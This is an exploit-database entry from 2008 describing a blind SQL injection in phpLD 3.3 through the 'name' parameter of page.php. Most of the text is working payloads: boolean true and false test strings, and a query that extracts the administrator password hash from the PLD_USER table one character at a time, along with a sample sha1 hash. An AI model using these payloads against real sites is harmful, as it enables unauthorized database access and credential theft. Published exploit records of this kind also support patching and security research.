Lucene search

K
exploitdbFuzionEDB-ID:7558
HistoryDec 23, 2008 - 12:00 a.m.

PHPLD 3.3 - Blind SQL Injection

2008-12-2300:00:00
fuzion
www.exploit-db.com
43

AI Score

7.4

Confidence

Low

phpLD 3.3 Blind SQL Injection
http://www.phplinkdirectory.com/

magic_quotes_gpc = Off
register_globals = On

Vulnerable:
GET http://site/phpld/page.php?name=

True Request:
(validpagename)' or 1=1#

False Request:
(validpagename)' or 1=0#

Try this (urlencode):
(validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1# etc...

Field value example:
{sha1}dd94709528bb1c83d08f3088d4043f4742891f4f


- Seasons Greetings -
- http://nukeit.org -

# milw0rm.com [2008-12-23]

AI Score

7.4

Confidence

Low

Related for EDB-ID:7558